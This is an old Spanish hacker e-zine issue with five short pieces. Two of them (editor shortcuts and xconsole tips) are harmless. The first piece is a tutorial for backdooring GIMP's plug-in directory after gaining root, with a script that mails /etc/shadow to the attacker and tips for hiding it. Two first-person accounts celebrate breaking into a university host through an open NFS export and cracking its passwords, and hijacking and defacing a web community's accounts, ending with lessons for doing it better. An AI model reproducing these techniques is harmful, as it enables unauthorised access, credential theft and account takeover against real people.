             -=( 7A69 E-zine 11 )=--=( Cortos )=--=( Varios )=-

   .-. .-     Titulo         -. .-  Autor -. 
-=( 1 |	Jugando con el Gimp    |   trycky 
-=( 2 | Atajos de toa la viada |   trycky 
-=( 3 | Mi primer Hack         |   Anonimo
-=( 4 | La caida de un imperio |   Anonimo
-=( 5 | xconsole               |   trycky

Si quereis mandar algun documento para que lo incluyamos no teneis mas que 
mandar un mail a staff@7a69ezine.org . Otra cosa es que decidi meter tantos
cortos mios por que los escribi hace ya mucho tiempo para la page del grupo
linuxeros de mi city y como nunca dieron la luz por que hicieran hueco por 
a qui , espero que os sirvan de algo . 

        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=( 1 :-=[ Jugando con el Gimp ]=--=[ trycky ]=-

En este articulo voy a explicar como una vez obtenido root en una maquina
podemos ejecutar lo que queramos a traves del Gimp doy por echo que sabeis lo
que es el Gimp y si no lo ejecutais y ya esta . Este que voy a explicar no
tiene uso si el dueo de la maquina nunca ejecuta el gimp bueno lo que hay
que hacer es muy simple el gimp tiene un directorio de donde lee los plugins
en verdad depende de la version la ultima los ha separado en varios en el
"/usr/lib/gimp/1.1/plug-ins" . Estan los ejecutables pero si tu metes un
script tambien lo ejecutara por lo que a qui viene la parte maliciosa en
principio habia puesto muchos ejemplos pero esto seria mas un curso de script
que otra cosa de por lo que lo dejo a vuestra eleccion los scripts, bueno enga
un ejemplo cutre . Que lo que hace es mandarle la lista de passwords al usuario
trycky y lo del 2> /dev/null es que si hay errores se vayan a /dev/null pa
no dar el cante en caso de error . Como veis los ejemplos ya corren a cargo
de vuestra imaginacion solo decir que el las ultimas versiones del gimp los
script-fu y los de perl bienen separados del resto. Otra cosa seria currarse
un script en el propio gimp y que cada vez que le diese hiciece algo esto es
facil de documentarse con la ayuda del gimp y el script fu register para el
script. A si instalais uno de estos ponerle un nombre poco cantoso por que
cada vez que inicia el Gimp va saliendo abajo los plug-ins que va cargando
y si el tio lee "loading plugins me-jodo-a-tu-makina" le daria algunos
indicios de que algo anda mal no creeis.

<++> gimp/ejem1

mail trycky < /etc/shadow & 2> /dev/null

exit 0

<-->

Ya lo demas es vuestra imaginacion podeis buscar archivos que os los envien
a donde querais "find / -name secreto -exec cp {} ~ \;" Esto buscaria el
archivo secreto y lo copiaria a vuestro home como veis no tiene limitaciones.

Otra cosa tambien es que permite ejecutar ejecutables valga la rebundancia
aunque si ya habeis sido root para poder instalar el script , pero bueno
tambien puede pasar de forma muy muy rara que tenga modo de escritura el
directorio "/usr/lib/gimp/1.1/plug-ins". Pero que os lo dejo a vuestra
imaginacion tambien podeis editar un script del perl que los hay tambien para
el gimp y que cada vez que se ejecute haga algo como que se yo lo que querais
pues ya esta creo que esto ha sido bastante en principio el documento iva a
tener mas ejemplos y chorradas pero creo que con esto basta .

Si tengo algun error en el doc o lo que sea podeis encontrarme en el IRC con
el nick de trycky claramente . Este doc esta muy bien para gastarle bromas a
los colegas :) . Hasta luegor

-=( 2 :-=[ Atajos de toa la vida ]=--=[ trycky ]=-

En este doc quiero daros los comandos mas utiles para el emacs y la shell
procurare meter lo basico del vi que tambien esta mu bien todo lo sacado de
aqui pues la verdad que lo he sacado de inumerables sitios y me han sido de
muchisima ayuda la verdad. A mi condicion el emacs es el mejor claramente
y una vez que te aprender los cuatro truquillos ya te es aun mas facil.

ctrl -> Ctrl
alt  -> Alt
m    -> Meta , Escape

-=( Funciones del VI )=-

Si le das a la tecla Insert puedes escribir despues le das a escape y pones
dos puntos ':' ya hora puedes poner los comandos . El vi tambien es bueninismo
y hay muchos clones suyos como son el vim , etc .

:e archvio.txt : Carga un archivo
:q             : Para salir del vi
:q!            : Para salir sin guardar cambios
:w             : Para guardar los cambios
:x             : Para salir y guardar los cambios
:r arvhivo.txt : Inserta un archvio desde donde esta el cursor
:r! comando    : Inserta un comando desde donde esta el cursor
:help          : Te muestra la ayuda

-=( Funciones Primordiales EMACS )=-

m-x     : Nos preguntara que modulo queremos cargar le damos a [TAB] y nos
          saldran todos los que hay es muy util.

ctrl-xf : Crea un nuevo archivo.
ctrl-xs : Salva el Documento.
ctrl-xc : Sale del Programa.

-=( Principales Funciones EMACS)=-

m-x     : Nos preguntara que modulo queremos cargar le damos a [TAB] y nos
          saldran todos los que hay es muy util.

ctrl-xf : Crea un nuevo archivo.
ctrl-xs : Salva el Documento.
ctrl-xc : Sale del Programa.

-=( Principales Funciones EMACS)=-

ctrl-s : Para buscar una frase o letra.
ctrl-r : Pra una busqueda hazia atras.
ctrl-k : Borra una linea desde donde esta el cursor.
ctrl-a : Va al principio de la linea.
ctrl-e : Va al final de la linea.
Meta-u : Convierte la palabra el MAUYUSCULAS.
Meta-l : Convierte la palabra el minisculas.
alt-u  : Deshace la ultima opcion.
alt-c  : Convierte La Primera Letra En Mayusculas Desde Donde Esta El Cursor.
ctrl-f : para avanzar como si fuese con los cursores.
ctrl-d : bora una letra.
ctrl-? : Deshaze lo ultimo que has echo.

-=( SHELL )=-

Ctrl-z  = Suspende una tarea la pone en modo background .
Ctrl-c  = Interrumpe la tarea vamos que la mata .
Ctrl-d  = Esto cierra la sesion igual q si pones exit .
Ctrl-xv = Muestra la version lo mismo que poner bash -version
Ctrl-l  = Como vimos "limpiaba" la pantalla .
Ctrl-k  = Borra la linea desde donde esta el cursor .
Ctrl-s  = Bloquea la terminal .
Ctrl-q  = Desbloquea la terminal .
Alt+dcha / Alt+izqda = Desplazamiento por las terminales virtuales
Ctrl-Alt-Fn = Cambio a otra terminal desde la terminal grafica
Alt-F7  = Cambio a la terminal grafica (si hay algun servidor en ejecucion).

-=( Archivo De Configuracion De Las Funciones de La Shell )=-

/etc/inputrc ; Archivo de Configuracion De Las Funciones
man readline ; Ayuda sobre las funciones

-=( 3 :-=[ Mi primer Hack ]=--=[ Anonimo ]=-

Saludos lectores de 7a69ezine ;). Os voy a contar mi primer hack del cual
aun me estoy riendo.

Era una tarde de clase. Entraba a las clases a las 15:30 por lo que esa hora
es letal si la noche anterior te acostaste tarde. Por si fuera poco
introduccion a teleco es una de esas pocas asignaturas de primero que
aprueba "to" cristo. Solo os voy a decir esto: el examen son 40 preguntas
tipo test. Cuatro opciones en cada pregunta y fallar no resta. Joder, que
alguien me calcule las posibilidades!! el nivel de azar es del 100% xDDDDD.
Bueno, el caso es que yo iba a clase como buen estudiante y mas teniendo en
cuenta que iban a hablar un poquito de inet y no me lo queria perder.

Empieza la clase hablandonos de TCP/IP. No esta mal, la verdad, sobre todo
para el que no habia oido hablar nada de esto. Pero yo me estoy aburriendo
muchiiiiiiiiiisimo. Cuanto llevamos media hora o asi el profesor nos dice
que vamos a experimentar con un ordenador de su departamento ( departamento
de comunicaciones ). Siiiiiiiiiiiii!!!!!!!!, saco papel y boli, me parece
que voya empezar a tomar apuntes ;). El ordenador era xxxxx.xxxxx.xxxxx.es
xDDDDDDD. Me lo apunto y yo tan encantao. El tio empieza a sacar utilidades
casposas del windows y le empieza a hacer ping, nslookup y cosas asi. Yo os
juro que no sabia que el win tenia de eso :-). Desde que empece a
experimentar con redes habia utilizado linux. Y el tio dale que te pego al
ping, al nslookup y a su puta madre. No se por que a mi se me ocurrian otras
herramientas ;). La clase termina siendo un aburrimiento y olvido este host
en mi mochila hasta que llego a casa donde lo a~ado a mi hit list. 

Iba a ser una tarde genial ;). Arranco mi debian. Y rulo el nmap. A mi
personalmente me gusta aunque me rio del modo stealth ;). FTP, telnet,
sunrpc, nfs... joder, to abierto, los departamento de comunicaciones no
tienen ni zorra de lo que es seguridad en la red ;). Esto iba bien. Pero yo
nada, paso de probar el ftp anononimo, paso del telnet directamente y voy de
cabeza a ver los ficheros exportables con showmount. Arggggggggg!!!!!!!!!.
No tengo palabras para describir lo que senti. Nunca habia llegado muy lejos
en el mundo de la seguridad pero cuando vi ese
/usr/home exportable para (everyone) sabia que algo iba a cambiar xD.
Me explico un poco. showmount es un comando en unix que te permite ver los
directorios exportables de una maquina. Los directorios exportables son unos
directorios que bajo unas limitaciones pueden ser montados en maquinas
remotas bajo unos permisos especificos. El sistema de ficheros que controla
estas caracteristicas es el NFS. Normalmente se limita el acceso a estos
ficheros exportables a las maquinas de la misma red o que tengan que ver ese
ordenador pero ellos nooooo, ellos tienen que permitir que todo el mundo
pueda montar sus directorios exportables, por que ? porque ellos son tope
guays xDDDD. Pero esto no acaba aqui, lo que te permiten montar son los
ficheros HOME de los usuarios que tienen acceso a la maquina. Esto es un MUY
GRAVE error de configuracion del NFS. Nunca se deben dejar estos directorios
exportables. El por que es muy sencillo. En un principio aunque cualquiera
los monte no podra hacer mucho ya que no es el due~o de ese HOME y por tanto
no tiene permisos de escritura y tal... Pero que pasa si creamos el usuario
de ese HOME en nuestro ordenata con el mismo id ?? Pues na, que nos dejan
escribir en ese HOME :). Y sobre todo es interesante porque con permiso de
escritura en los homes se pueden hacer muchas cosas... os suena .rhosts ?
;). Si no os suena buscar un par de manuales sobre seguridad en inet y
enseguida encontrareis info al respecto. 

Me parece increible que un ordenador asi cometa errores de este nivel. Si
contuvieran info sensible encima los denuncio xDDDDDDDDDD. Bueno, me meto y
empizo a buscar cosillas: 
find / -perm 4755 2>/dev/null y demas... 
y luego las cosas interesantes: 
find / -name *exam* 2>/dev/null xDDDDDDD
...
De pronto se me ocurre algo. 
$ cat /etc/passwd
xDDDDDDDDDDDDD

No es increible ? No estan shadowed, joder pero si en las distros actuales
solo tienes que decir que si durante la instalacion !!!!!!!

Vale, copy&paste rules. Asi que llamo a mi amigo John y le pregunto que
piensa el ;). Y me empieza a soltar passwords de los profes. Joderrrrrrrrrr,
pasa que pongais de pass el login mas un numero, pasa que pongais el mismo
pass que el login, pero NO pasa que no PONGAIS PASSSSSSSSSS!!!!!!!. Bueno,
este solo fue un caso...Pero el resto eran la ostia. El password de un
profesor: quetetastieneladelaprimerafila xDDDDDDDDDDDDDDDDDD Es co~a. Todo
eran nombres de tias, algun insecto, alguna fruta y el resto login mas algun
numero. Por supuesto me quedaron algunos sin crackear como el root
:((. Despues de todo era mi primer hack!!.  Por cierto era un Digital Unix,
alguien me pasa un xploit que rule ? =o). 

        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=( 4 :-=[ La caida de un imperio ]=--=[ Anonimo ]=-

__| ''INICIO''|__

	El como me llame, no importa, lo unico que importa de
verdad, es que hago usufructo de este invento que es
la red, puesto que hago usufructo soy un usuario.

	Como usuario, me siento ligado a unos derechos, y a
unos deberes. Y dado que soy un usuario de "internet"
e internet es "libre",

		-tengo el derecho a ser libre
		-tengo el deber de respetar y salvaguardar la
libertad de los demas

	Una vez planteada esta piedra filosofal (basica),
vamos al meollo de la question.

__|''LA QUESTION"|__

	Soy usuario habitual de un portal de internet (no
dire porque) que permite que el total de sus usuarios
se organice en comunidades virtuales, cada una con sus
propios y singulares contenidos, y que los fundadores
de cada tipo de comunidad creada pueda gestionar sus
paginas, su chat y su foro.
	Alli hay de todo, pero llamaba la atencion una
comunidad en concreto, una supuesta comunidad hacker,
que entre todos los contenidos que ofrecia en sus
paginas, unos de ellos eran de lo mas jugoso.

--La ya consabida milonga de crakear una cuenta de
hotmail, mandanto tu user/passwd y user a crakear,
dentro del body de un mail a security_box@hotmail.com.
Decian de esto que era un tutorial de hack que les
habia costado mucho encontrar y que funcionaba de
maravilla.

--En otra de las paginas decia lo siguiente:
	"Nosotros somos el poblado que mas descargas de
programas hackers tiene, no lo dudes unete a nosotros.
SERIA UNA COSA MUY GRAVE QUE USARAS ESOS PROGRAMAS
CONTRA NOSOTROS, si asi lo hicieras los programas se
volverian contra ti, o no funcionarian, si de todas
maneras quieres hacerlo, que sepas que nos daremos
cuenta y actuaremos en consecuencia y blah blah blah".

	Comentandolo con otros usuarios, nos parecio algo muy
feo, incluso censurable, (una cosa es usar un poco de
I-S y otra muy diferente aprovecharte de unos chavales
que confian en ti). Asi que les sugerimos que lo
quitaran, ellos no solo no quitaron esos contenidos,
sino que se rieron de nosotros (los usuarios) con
alusiones del tipo "que vais a hacer lamers, nosotros
somos "hackers"". _O

Para empezar a hablar con propiedad y dejarnosde
vaguerias diremos todo con nombres y apellidos:

Portal = Pobladores = http://www.pobladores.com
.
Comunidad virtual (cv) = MundoyHacker =
http://www.pobladores.com/territorios/informatica/Mundoyhacker(inutil
url por cierto ya)
.
Webmaster de comunidad virtual = Airon2
.
Mail del webmaster de la cv = espinola.mola@ozu.es
.

__|''LA DECISION''|__

	Una tarde de domingo que me aburria mucho, decidi
hacer algo al respecto. Los pasos serian los
siguientes:

-Entrar en su correo de Ozu (espinola.mola@ozu.es)
-Hacer que Pobladores.com, enviara la clave del
webmaster de Mundoyhacker a su correo en ozu
-Con esa clave entrar en www.pobladores.com como
Airon2 y hacerme con el control del contenido de la
web y modificarla en los siguientes puntos:

	--Quitar a TODOS los administradores secundarios
	--Cambiar el contenido de la pagina de inicio de ese
website, por un manifesto haciendo unas peticiones.
	--Quitar las pag que creia que se aprovechaban de los
usuarios (tema Hotmail y los prog con vida propia
(Pfffff)(desde cuando un portscan se vuelve contra uno
mismo, es que me escaneara mis puertos cuando no se lo
pida??).
	--Cambiar el passwd de esa cuenta y secuestrarla (el
webmaster no tendria acceso a modificar su web)
	--Mantenerla secuestrada hasta que el webmaster de
ese site enviara un mail a una direccion de correo
prometiendo cumplir con los puntos expuestos en el
manifesto.

	Creyendo que lo tenia todo planeado y confiando en mi
escasa habilidad me puse a currar, ( y eso dio paso al
desastre mas bochornoso que he tenido en cuanto a este
tipo de actividades se refiere)(ya ireis viendo el
porque a medida que avanza el proceso).

__|''EL "MARRON"''|__

	Vamos a ir por pasos, entrar en su correo de Ozu no
fue demasiado complicado, (si os digo como os
cachondeareis de mi, no tiene na que ver con lo que la
gente llama hack, ni con la IS ni na po el estilo).

	Pobladores.com no me puso problemas a la hora de
mandarme el password de la cuenta de Airon2 a su
correo espinola.mola@ozu.es.

	(describir el estado de delirium tremens cuando hice
eso es imposible, de hecho quiza fue por el estado de
euforia en que me encontraba que la cague de manera
tan gorda)		

	Entre en pobladores.com como Airon2 , cambie el
password de usuario y me meti en la configuracion de
Mundoyhacker, borre a todos los coadministradores,
inserte una pagina al principio de las demas, (para
que fuera la de inicio), y empece a escribir en ella
sobre la marcha el texto del Manifesto.

	Justo en ese momento las 17:30 + o - Airon2, el
webmaster de Mundoyhacker entro en su cuenta de correo
y vio que pobladores le habia mandado el password de
su cuenta en pobladores....

	Mientras tanto yo ajeno al desastre iva escribiendo y
actualizando los cambios a medida que escribia, usease
que me tomaba mi tiempo...

	Airon2 llamo a sus colegas (los coadministradores de
Mundoyhacker) que casualmente estaban online......

	Y yo modifica que modifica la puta pagina.....

	Airon2 intenta entrar en pobladores.com con su
user/passwd y no puede (la habia cambiado yo), sus
colegas al borde de un ataque de nervios le dicen que
alguien es esos mismisimos instantes esta modificando
y remodificando y requetemodificando, una pagina de
inicio nueva que ellos no han visto en la vida y que
habla de no se que puta Asociacion de Usuarios
Desatendidos........

	Y yo corrigiendo faltas de ortografia......

	Airon2 pide a pobladores.com que le mande la clave a
su mail, y la recibe en su correo, y entra en
pobladores como Airon2 con la nueva clave (la que yo
habia cambiado), y va a Mundoy hacker y se mete en la
configuracion......

	En la ultima de las actualizadas que hice  pobladores
me dice que no puedo modificar esa pagina
sencillamente porque no existe _  como que no
existe??, me temo lo peor y miro la cuenta de correo,
"EL" ya esta alli veo que se ha hecho mandar la clave
cambiada, estamos los dos a la vez en su cuenta de
mail y en su cuenta de pobladores....

 	A partir de entonces empieza una guerra continua de
actualizaciones, cambios de password, y mandadas de
password al mail en el que estabamos, peleandonos asi
estuvimos una hora.....

	Debido a una mala conexion de linia (supongo) o a que
me caduco la galletita o no se verifico o yo que se
que, pierdo mi presencia en su correo,....

	_

	Solo me queda la batalla por pobladores, entro en
control de datos del usuario Airon2 y cambio la
direccion de mail a el cual hay que mandar el password
(en el caso que se haga la peticion), acto seguido
cambio el password de la cuenta por centesima vez,....

	 _u

	Demasiado tarde, en un ataque de histeria "infundada"
Airon2 el autentico lo borra todo, toda su comunidad
virtual, y desaparece de escena.

	En realidad yo no queria que esto acabara asi, pero a
lo hecho pecho.


__|''LECCIONES APRENDIDAS''|__

Puede que el caso en si sea algo "cutre", pero si se
traslada a efectos de hacer algo mas gordo, las
lecciones aprendidas sirven igual.

--mi desconocimiento del servidor de Ozu lo llevo todo
a la ruina, no tenia puta idea de donde podia cambiar
la contrasea, si hubiera hecho eso na mas empezar
todo hubiera cambiado.

--haberlo planeao solo en 10 minutos (demasiado
precipitado).

--hacerlo a las horas ande el 90 por cien de los
internautas esta conectao, (un domingo por la tarde
manda huevos).

--no cambiar la direccion de correo a donde manda
pobladores el passwd, desde el principio(jodeeeerrr).

--no llevar el Manifesto preparado y perder un tiempo
precioso escribiendolo sobre la marcha.

--no contar con algun amigo del alma, que me echara
una mano en los momentos de mayor stress.

--tomarme un cafe con leche y madalenas en medio de
todo ese sarao, (cuando vi que Airon2 estaba
conectado, me dio un patatus tal que deje toda la
superficie de trabajo pringada)

--no llevar un guion de los pasos a hacer bien
estructurado ( cuando estas nervioso, pierdes el
norte)

	si se os ocurre alguna otra decidmela, porque toda la
historia esta me fustro bastante y me he jurado a mi
mismo que no volvere cagarla de esta manera nunca mas.


__|''FIN??''|__

  	No, Airon2 y sus colegas formaron una asociacion
anti_hackers, dadole a la Asociacion de Usuarios
Desatendidos, la culpa de todo, y vinculando el ataque
a gente que poco o nada sabe del tema:

http://www.pobladores.com/territorios/informatica/anti_aud

	Por su parte AUD creo su pagina web, metiendoles mas
lea al fuego y colgando ahi el manifesto que
inicialmente debia ser colgado en MundoyHaker para
verguenza y escarnio publicos:

http://www.pobladores.com/territorios/gente/aud

	
	Los que inicialmente denunciaron las irregularidades
de MundoyHaker, un poblado para novatos en esto de los
ordenadores, se han visto amenazados por  Airon2 y los
demas supuestos Hackers de MundoyHacker, pero ellos
siguen pasando de todo y a su rollo, (especialmente
cachondo es el dossier verguenza, que trata sobre el
tema, y unos bugs que tienen descritos ahi de lo mas
sabroson):

http://www.pobladores.com/territorios/informatica/hack_it

...... Y eso es todo, (por ahora)


pa cualquier duda, consejo o incluso para reiros en mi
jeta por mi torpeza...
		llllllcodebar@yahoo.com

A los usuarios de Mundoyhacker, mis disculpas. (sorry,
esto no iva con vosotros)

A la gente que le pone empeo en aprender esto mis
saludos.

A los demas usuarios de internet que viven y dejan
vivir, mis respetos.

A los EX-administradores del EX-poblado
Mundoyhacker.... mi mas sentido pesame. (mas que una
muerte, fue un suicidio)

[NOTA-Para variar el fallo aprovechado para hacer todo
esto, no fue mas que la poca gracia que tiene la gente
a la hora de currarse el password][posiblemente todo
este galimatias no os valga para nada, haced con ello
lo que os de la gana, pero si os hace falta traducir,
sabed que podeis contar conmigo, idioma ingles,
conocimientos de electronica y software los
suficientes como para no traducir socket como calcetin
(en lo que a informatica se refiere)]

gracias por vuestra atencion

-=( 5 :-=[ xconsole ]=--=[ trycky ]=-

Muchas veces nos hemos visto que estamos en la terminal y debemos de psar una
direccion o algun dato a leer en las xfree . Lo que muchas veces se solia hacer
era pasarlo a un fichero y leerlo desde una xterm , pero usando el xconsole
nos ahorraremos todo esto con lanzar el "xconsole" es un monitarizador por las
X de esta forma si ponemos en el "syslogd.conf" si usamos el syslogd podriamos
hacer que apareciecen los mensajes desde esta y tener mas controlada la maquina
y para lo que yo lo queria explicar era si estamos desde la terminal usando el
BitchX por ejemplo y queremos pasar una direccion al netscape por ejemplo seria
volcando la info al xconsole :

real@lepton:~ > echo "www.7a69ezine.org" > /dev/xconsole

Apr  4 22:53:21 lepton PAM_unix[290]: (cron) session closed for user mail
www.7a69ezine.org

Como vemos esto seria lo que nos volcaria la xconsole .

Y ahora una linea para el "syslog.conf" para volcar mas informacion por el
xconsole :

daemon.*;mail.*;\
        news.crit;news.err;news.notice;\
        *.=debug;*.=info;\
        *.=notice;*.=warn       |/dev/xconsole

O simplemente :

*.* /dev/xconsole 

Bueno esto solo era un consejo que a lo mejor nos sera muy util.
Si teneis problemas al intentar pasar algo al xconsole probar a mirar los
permisos de /dev/xconsole .

        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
